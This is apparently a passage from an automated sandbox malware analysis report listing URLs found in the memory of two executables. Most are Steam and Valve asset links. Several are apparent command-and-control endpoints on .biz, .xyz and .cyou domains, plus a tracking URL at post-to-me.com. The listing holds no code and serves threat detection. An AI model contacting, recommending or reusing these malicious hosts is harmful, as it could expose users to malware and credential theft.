                  Source: 1A68.tmp.exe, 00000003.00000003.2373829364.0000000003176000.00000004.00000800.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373574443.0000000003171000.00000004.00000800.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373631508.0000000000914000.00000004.00000020.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373470875.00000000009A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/privacy_agreement/
                  Source: 1A68.tmp.exe, 00000003.00000003.2373829364.0000000003176000.00000004.00000800.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373574443.0000000003171000.00000004.00000800.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373631508.0000000000914000.00000004.00000020.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373470875.00000000009A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/subscriber_agreement/
                  Source: Amcache.hve.10.drString found in binary or memory: http://upx.sf.net
                  Source: 1A68.tmp.exe, 00000003.00000003.2373829364.0000000003176000.00000004.00000800.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373470875.00000000009A9000.00000004.00000020.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373574443.0000000003171000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.valvesoftware.com/legal.htm
                  Source: 1A68.tmp.exe, 00000003.00000003.2373597748.00000000009A2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.steampowered.com/
                  Source: 1A68.tmp.exe, 00000003.00000003.2373574443.0000000003171000.00000004.00000800.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373631508.0000000000914000.00000004.00000020.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373470875.00000000009A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://avatars.fastly.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
                  Source: 1A68.tmp.exe, 00000003.00000003.2373734520.0000000000932000.00000004.00000020.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373631508.0000000000930000.00000004.00000020.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000002.2433686824.0000000000933000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://awake-weaves.cyou/apiZ
                  Source: 1A68.tmp.exe, 00000003.00000002.2433793949.00000000009A2000.00000004.00000020.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373597748.00000000009A2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://broadcast.st.dl.eccdnx.com
                  Source: 1A68.tmp.exe, 00000003.00000002.2433793949.00000000009A2000.00000004.00000020.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373597748.00000000009A2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/
                  Source: 1A68.tmp.exe, 00000003.00000003.2373597748.00000000009A2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://checkout.steampowered.com/
                  Source: 1A68.tmp.exe, 00000003.00000003.2373597748.00000000009A2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/
                  Source: 1A68.tmp.exe, 00000003.00000003.2373829364.0000000003176000.00000004.00000800.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373574443.0000000003171000.00000004.00000800.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373631508.0000000000914000.00000004.00000020.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373470875.00000000009A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/applications/community/main.css?v=Lj6X7NKUMfzk&a
                  Source: 1A68.tmp.exe, 00000003.00000003.2373829364.0000000003176000.00000004.00000800.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373470875.00000000009A9000.00000004.00000020.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373574443.0000000003171000.00000004.00000800.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373470875.00000000009A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/globalv2.css?v=hzEgqbtRcI5V&l=english&_c
                  Source: 1A68.tmp.exe, 00000003.00000003.2373829364.0000000003176000.00000004.00000800.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373470875.00000000009A9000.00000004.00000020.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373574443.0000000003171000.00000004.00000800.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373470875.00000000009A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/promo/summer2017/stickers.css?v=Ncr6N09yZIap&amp
                  Source: 1A68.tmp.exe, 00000003.00000003.2373829364.0000000003176000.00000004.00000800.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373470875.00000000009A9000.00000004.00000020.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373574443.0000000003171000.00000004.00000800.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373470875.00000000009A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/header.css?v=EM4kCu67DNda&l=english&a
                  Source: 1A68.tmp.exe, 00000003.00000003.2373829364.0000000003176000.00000004.00000800.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373470875.00000000009A9000.00000004.00000020.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373574443.0000000003171000.00000004.00000800.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373470875.00000000009A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/modalContent.css?v=WXAusLHclDIt&l=eng
                  Source: 1A68.tmp.exe, 00000003.00000003.2373829364.0000000003176000.00000004.00000800.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373470875.00000000009A9000.00000004.00000020.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373574443.0000000003171000.00000004.00000800.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373470875.00000000009A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/profilev2.css?v=fe66ET2uI50l&l=englis
                  Source: 1A68.tmp.exe, 00000003.00000003.2373829364.0000000003176000.00000004.00000800.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373574443.0000000003171000.00000004.00000800.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373631508.0000000000914000.00000004.00000020.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373470875.00000000009A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
                  Source: 1A68.tmp.exe, 00000003.00000002.2433623776.0000000000905000.00000004.00000020.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373829364.0000000003176000.00000004.00000800.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373574443.0000000003171000.00000004.00000800.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373470875.00000000009A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
                  Source: 1A68.tmp.exe, 00000003.00000003.2373829364.0000000003176000.00000004.00000800.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373574443.0000000003171000.00000004.00000800.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373631508.0000000000914000.00000004.00000020.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373470875.00000000009A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6
                  Source: 1A68.tmp.exe, 00000003.00000003.2373829364.0000000003176000.00000004.00000800.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373574443.0000000003171000.00000004.00000800.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373631508.0000000000914000.00000004.00000020.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373470875.00000000009A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/main.js?v=Cx79WC7T
                  Source: 1A68.tmp.exe, 00000003.00000003.2373829364.0000000003176000.00000004.00000800.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373574443.0000000003171000.00000004.00000800.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373631508.0000000000914000.00000004.00000020.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373470875.00000000009A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/manifest.js?v=foEB
                  Source: 1A68.tmp.exe, 00000003.00000003.2373829364.0000000003176000.00000004.00000800.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373470875.00000000009A9000.00000004.00000020.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373574443.0000000003171000.00000004.00000800.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373470875.00000000009A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/global.js?v=jWc2JLWHx5Kn&l=english&am
                  Source: 1A68.tmp.exe, 00000003.00000003.2373829364.0000000003176000.00000004.00000800.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373470875.00000000009A9000.00000004.00000020.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373574443.0000000003171000.00000004.00000800.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373470875.00000000009A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=gQHVlrK4-jX-&l
                  Source: 1A68.tmp.exe, 00000003.00000003.2373829364.0000000003176000.00000004.00000800.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373470875.00000000009A9000.00000004.00000020.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373574443.0000000003171000.00000004.00000800.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373470875.00000000009A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/modalContent.js?v=uqf5ttWTRe7l&l=engl
                  Source: 1A68.tmp.exe, 00000003.00000003.2373829364.0000000003176000.00000004.00000800.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373470875.00000000009A9000.00000004.00000020.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373574443.0000000003171000.00000004.00000800.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373470875.00000000009A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/modalv2.js?v=zBXEuexVQ0FZ&l=english&a
                  Source: 1A68.tmp.exe, 00000003.00000003.2373829364.0000000003176000.00000004.00000800.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373470875.00000000009A9000.00000004.00000020.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373574443.0000000003171000.00000004.00000800.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373470875.00000000009A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/profile.js?v=GeQ6v03mWpAc&l=english&a
                  Source: 1A68.tmp.exe, 00000003.00000003.2373829364.0000000003176000.00000004.00000800.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373470875.00000000009A9000.00000004.00000020.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373574443.0000000003171000.00000004.00000800.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373470875.00000000009A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/promo/stickers.js?v=CcLRHsa04otQ&l=en
                  Source: 1A68.tmp.exe, 00000003.00000003.2373829364.0000000003176000.00000004.00000800.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373470875.00000000009A9000.00000004.00000020.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373574443.0000000003171000.00000004.00000800.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373470875.00000000009A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/prototype-1.7.js?v=npJElBnrEO6W&l=eng
                  Source: 1A68.tmp.exe, 00000003.00000003.2373829364.0000000003176000.00000004.00000800.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373470875.00000000009A9000.00000004.00000020.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373574443.0000000003171000.00000004.00000800.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373470875.00000000009A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/reportedcontent.js?v=-lZqrarogJr8&l=e
                  Source: 1A68.tmp.exe, 00000003.00000003.2373829364.0000000003176000.00000004.00000800.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373470875.00000000009A9000.00000004.00000020.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373574443.0000000003171000.00000004.00000800.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373470875.00000000009A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=pbdAKOcDIgbC
                  Source: 1A68.tmp.exe, 00000003.00000003.2373829364.0000000003176000.00000004.00000800.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373470875.00000000009A9000.00000004.00000020.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373574443.0000000003171000.00000004.00000800.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373470875.00000000009A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/webui/clientcom.js?v=ImL_uti9QFBw&l=e
                  Source: 1A68.tmp.exe, 00000003.00000003.2373829364.0000000003176000.00000004.00000800.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373470875.00000000009A9000.00000004.00000020.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373574443.0000000003171000.00000004.00000800.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373470875.00000000009A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/buttons.css?v=qhQgyjWi6LgJ&l=english&
                  Source: 1A68.tmp.exe, 00000003.00000003.2373470875.00000000009A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/motiva_sans.css?v=-yZgCk0Nu7kH&l=engl
                  Source: 1A68.tmp.exe, 00000003.00000003.2373829364.0000000003176000.00000004.00000800.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373470875.00000000009A9000.00000004.00000020.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373574443.0000000003171000.00000004.00000800.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373470875.00000000009A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/shared_global.css?v=wuA4X_n5-mo0&l=en
                  Source: 1A68.tmp.exe, 00000003.00000003.2373829364.0000000003176000.00000004.00000800.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373470875.00000000009A9000.00000004.00000020.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373574443.0000000003171000.00000004.00000800.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373470875.00000000009A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/shared_responsive.css?v=JL1e4uQSrVGe&
                  Source: 1A68.tmp.exe, 00000003.00000003.2373829364.0000000003176000.00000004.00000800.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373470875.00000000009A9000.00000004.00000020.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373574443.0000000003171000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
                  Source: 1A68.tmp.exe, 00000003.00000003.2373829364.0000000003176000.00000004.00000800.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373470875.00000000009A9000.00000004.00000020.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373574443.0000000003171000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/header_logo.png
                  Source: 1A68.tmp.exe, 00000003.00000003.2373829364.0000000003176000.00000004.00000800.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373470875.00000000009A9000.00000004.00000020.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373574443.0000000003171000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png
                  Source: 1A68.tmp.exe, 00000003.00000003.2373829364.0000000003176000.00000004.00000800.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373470875.00000000009A9000.00000004.00000020.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373574443.0000000003171000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
                  Source: 1A68.tmp.exe, 00000003.00000003.2373829364.0000000003176000.00000004.00000800.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373470875.00000000009A9000.00000004.00000020.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373574443.0000000003171000.00000004.00000800.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373470875.00000000009A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/auth_refresh.js?v=w6QbwI-5-j2S&amp
                  Source: 1A68.tmp.exe, 00000003.00000003.2373829364.0000000003176000.00000004.00000800.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373470875.00000000009A9000.00000004.00000020.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373574443.0000000003171000.00000004.00000800.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373470875.00000000009A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/shared_global.js?v=Gr6TbGRvDtNE&am
                  Source: 1A68.tmp.exe, 00000003.00000003.2373829364.0000000003176000.00000004.00000800.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373470875.00000000009A9000.00000004.00000020.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373574443.0000000003171000.00000004.00000800.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373470875.00000000009A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=tvQ
                  Source: 1A68.tmp.exe, 00000003.00000003.2373829364.0000000003176000.00000004.00000800.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373470875.00000000009A9000.00000004.00000020.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373574443.0000000003171000.00000004.00000800.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373470875.00000000009A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/tooltip.js?v=QYkT4eS5mbTN&l=en
                  Source: 1A68.tmp.exe, 00000003.00000003.2327414310.000000000093D000.00000004.00000020.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000002.2433686824.000000000093D000.00000004.00000020.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373631508.000000000093D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://deafeninggeh.biz/api
                  Source: 1A68.tmp.exe, 00000003.00000003.2327414310.000000000093D000.00000004.00000020.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000002.2433686824.000000000093D000.00000004.00000020.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373631508.000000000093D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://deafeninggeh.biz/apiy
                  Source: 1A68.tmp.exe, 00000003.00000003.2327414310.000000000093D000.00000004.00000020.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000002.2433686824.000000000093D000.00000004.00000020.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373631508.000000000093D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://deafeninggeh.biz/z
                  Source: 1A68.tmp.exe, 00000003.00000003.2373734520.0000000000932000.00000004.00000020.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373631508.0000000000930000.00000004.00000020.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000002.2433686824.0000000000933000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://diffuculttan.xyz/api
                  Source: 1A68.tmp.exe, 00000003.00000003.2327414310.000000000093D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://effecterectz.xyz/
                  Source: 1A68.tmp.exe, 00000003.00000003.2327414310.000000000093D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://effecterectz.xyz/api
                  Source: 1A68.tmp.exe, 00000003.00000003.2327414310.000000000093D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://effecterectz.xyz/api2
                  Source: 1A68.tmp.exe, 00000003.00000003.2327414310.000000000093D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://effecterectz.xyz/api8
                  Source: 1A68.tmp.exe, 00000003.00000003.2327414310.000000000093D000.00000004.00000020.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000002.2433686824.000000000093D000.00000004.00000020.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373631508.000000000093D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://effecterectz.xyz/apiS
                  Source: 1A68.tmp.exe, 00000003.00000002.2433623776.0000000000905000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://effecterectz.xyz/h
                  Source: 1A68.tmp.exe, 00000003.00000003.2327414310.000000000093D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://effecterectz.xyz/l
                  Source: 1A68.tmp.exe, 00000003.00000003.2373597748.00000000009A2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.steampowered.com/
                  Source: 1A68.tmp.exe, 00000003.00000003.2373829364.0000000003176000.00000004.00000800.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373470875.00000000009A9000.00000004.00000020.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373574443.0000000003171000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://help.steampowered.com/en/
                  Source: 1A68.tmp.exe, 00000003.00000003.2327553516.0000000000932000.00000004.00000020.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373734520.0000000000932000.00000004.00000020.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2327414310.0000000000930000.00000004.00000020.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373631508.0000000000930000.00000004.00000020.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000002.2433686824.0000000000933000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://immureprech.biz/api
                  Source: 1A68.tmp.exe, 00000003.00000003.2373597748.00000000009A2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.steampowered.com/
                  Source: 1A68.tmp.exe, 00000003.00000002.2433793949.00000000009A2000.00000004.00000020.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373597748.00000000009A2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lv.queniujq.cn
                  Source: 1A68.tmp.exe, 00000003.00000002.2433793949.00000000009A2000.00000004.00000020.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373597748.00000000009A2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://medal.tv
                  Source: 1A68.tmp.exe, 00000003.00000002.2433793949.00000000009A2000.00000004.00000020.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373597748.00000000009A2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://player.vimeo.com
                  Source: rHrG691f7q.exe, 00000000.00000002.4623107198.0000000000A6E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://post-to-me.com/
                  Source: rHrG691f7q.exeString found in binary or memory: https://post-to-me.com/track_prt.php?sub=
                  Source: rHrG691f7q.exe, 00000000.00000002.4622755016.0000000000400000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://post-to-me.com/track_prt.php?sub=&cc=DE
                  Source: rHrG691f7q.exe, 00000000.00000002.4623107198.0000000000A36000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://post-to-me.com/track_prt.php?sub=0&cc=DE
                  Source: rHrG691f7q.exe, 00000000.00000002.4623107198.0000000000A36000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://post-to-me.com/track_prt.php?sub=0&cc=DEN
                  Source: 1A68.tmp.exe, 00000003.00000002.2433793949.00000000009A2000.00000004.00000020.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373597748.00000000009A2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://recaptcha.net
                  Source: 1A68.tmp.exe, 00000003.00000002.2433793949.00000000009A2000.00000004.00000020.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373597748.00000000009A2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://recaptcha.net/recaptcha/;
                  Source: 1A68.tmp.exe, 00000003.00000002.2433793949.00000000009A2000.00000004.00000020.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373597748.00000000009A2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://s.ytimg.com;
                  Source: 1A68.tmp.exe, 00000003.00000002.2433793949.00000000009A2000.00000004.00000020.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373597748.00000000009A2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sketchfab.com
                  Source: 1A68.tmp.exe, 00000003.00000002.2433793949.00000000009A2000.00000004.00000020.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373597748.00000000009A2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steam.tv/
                  Source: 1A68.tmp.exe, 00000003.00000002.2433793949.00000000009A2000.00000004.00000020.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373597748.00000000009A2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcast-test.akamaized.net
                  Source: 1A68.tmp.exe, 00000003.00000002.2433793949.00000000009A2000.00000004.00000020.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373597748.00000000009A2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcast.akamaized.net
                  Source: 1A68.tmp.exe, 00000003.00000002.2433793949.00000000009A2000.00000004.00000020.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373597748.00000000009A2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcastchat.akamaized.net
                  Source: 1A68.tmp.exe, 00000003.00000003.2373574443.0000000003171000.00000004.00000800.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373631508.000000000093D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/
                  Source: 1A68.tmp.exe, 00000003.00000003.2373829364.0000000003176000.00000004.00000800.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373470875.00000000009A9000.00000004.00000020.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373574443.0000000003171000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
                  Source: 1A68.tmp.exe, 00000003.00000003.2373734520.0000000000932000.00000004.00000020.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373631508.0000000000930000.00000004.00000020.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000002.2433686824.0000000000933000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/B
